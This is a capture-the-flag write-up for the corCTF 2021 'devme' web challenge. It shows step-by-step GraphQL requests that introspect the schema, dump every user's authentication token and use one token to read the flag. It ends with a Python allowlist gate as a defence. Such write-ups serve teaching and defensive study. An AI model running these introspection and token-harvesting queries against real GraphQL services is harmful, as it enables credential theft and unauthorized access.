# devme 323 points

# Description
an ex-google, ex-facebook tech lead recommended me this book!

https://devme.be.ax

# Solution

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/corCTF_2021_Writeup/Web/devme/info1.png)

There is an *email form* at the bottom of the webpage.

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/corCTF_2021_Writeup/Web/devme/info2.png)

If we enter a random email and click *send*, we can see a *request* to a [GraphQL](https://en.wikipedia.org/wiki/GraphQL) endpoint in the *network* tab.

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/corCTF_2021_Writeup/Web/devme/info3.png)

### The Request Payload
```json
{
"query": "mutation createUser($email: String!) {\n\tcreateUser(email: $email) {\n\t\tusername\n\t}\n}\n",
"variables": {
"email": "[email protected]"
}
}
```
The key point is that the **query** field is supplied by the client, so it can be replaced with any GraphQL query you want.

First, let's see what defined *GraphQL* queries are available to us.

### Request
```json
{
"query":"{__schema {queryType {fields {name description}}}}"
}
```
### Response
```json
{
"data": {
"__schema": {
"queryType": {
"fields": [
{
"name": "users",
"description": null
},
{
"name": "flag",
"description": null
}
]
}
}
}
}
```
**flag** looks very interesting.

Let's try to query that!

### Request
```json
{
"query":"{flag}"
}
```
### Response
```json
{
"errors": [
{
"message": "Field \"flag\" argument \"token\" of type \"String!\" is required, but it was not provided.",
"locations": [
{
"line": 1,
"column": 2
}
]
}
]
}
```
Hmm... a **token** is required, and we don't know one.

Trying a random **token** just gives `Invalid token!`

### Request
```json
{
"query":"{flag(token: \"aaa\")}"
}
```
### Response
```json
{
"errors": [
{
"message": "Invalid token!",
"locations": [
{
"line": 1,
"column": 2
}
],
"path": [
"flag"
]
}
],
"data": null
}
```
Now, it's time to look at **users**.

Let's check if **token** is in it.

### Request
```json
{
"query":"{users{token}}"
}
```
### Response
```json
{
"data": {
"users": [
{
"token": "3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b"
},
{
"token": "5568f87dc1ca15c578e6b825ffca7f685ac433c1826b075b499f68ea309e79a6"
},
{
"token": "d34609c0c342f7dc6f3d8b18356dfeda82a233a9846c7d2dbab8fb803719caf9"
},
...
```
There are a lot of tokens.

Let's try the first one!

### Request
```json
{
"query":"{flag(token: \"3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b\")}"
}
```
### Response
```json
{
"data": {
"flag": "corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}"
}
}
```
There is the flag!!!

*flag*: `corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}`
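The whole chain works because the endpoint runs whatever `query` string the client posts. As an added example (not from the original writeup or the challenge's code), here is a server-side allowlist gate in Python that accepts only the `createUser` mutation the front end sends; `gate`, `ALLOWED` and `make_body` are hypothetical names, and the sample requests are constructed from the payloads shown above.

```python
import hashlib
import json

# The one operation the front end sends, copied from the request payload above.
CREATE_USER = ("mutation createUser($email: String!) {\n\tcreateUser(email: $email)"
               " {\n\t\tusername\n\t}\n}\n")

def digest(query: str) -> str:
    """Hash the query with whitespace runs collapsed, so reformatting still matches."""
    return hashlib.sha256(" ".join(query.split()).encode()).hexdigest()

# digest -> (operation name, stored query text, required variable names)
ALLOWED = {digest(CREATE_USER): ("createUser", CREATE_USER, {"email"})}

def gate(raw_body: bytes):
    """Return (status, detail, query_to_execute) for one POST body."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return 400, "body is not JSON", None
    if not isinstance(body, dict):  # also rejects batched (array) requests
        return 400, "expected a single JSON object", None
    query = body.get("query")
    if not isinstance(query, str):
        return 400, "missing query", None
    entry = ALLOWED.get(digest(query))
    if entry is None:  # introspection, {users{token}}, {flag(...)} all end here
        return 403, "operation not in allowlist", None
    name, stored, var_names = entry
    variables = body.get("variables") or {}
    if not isinstance(variables, dict) or set(variables) != var_names:
        return 400, "unexpected variables", None
    # Execute the stored text, never the client's copy of it.
    return 200, name, stored

def make_body(query, variables=None) -> bytes:
    """Build a request body (constructed sample input)."""
    return json.dumps({"query": query, "variables": variables}).encode()

if __name__ == "__main__":
    for q in (CREATE_USER, "{__schema {queryType {fields {name description}}}}",
              "{users{token}}", '{flag(token: "aaa")}'):
        status, detail, _ = gate(make_body(q, {"email": "user@example.test"}))
        print(status, detail, "<-", " ".join(q.split())[:50])
```

The allowlist only narrows which operations run; the `users` resolver still needs its own authorization so that `token` is never returned to an unauthenticated caller.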

Original writeup (https://github.com/MikelAcker/CTF_WRITEUPS_2021/tree/main/corCTF_2021_Writeup/Web/devme).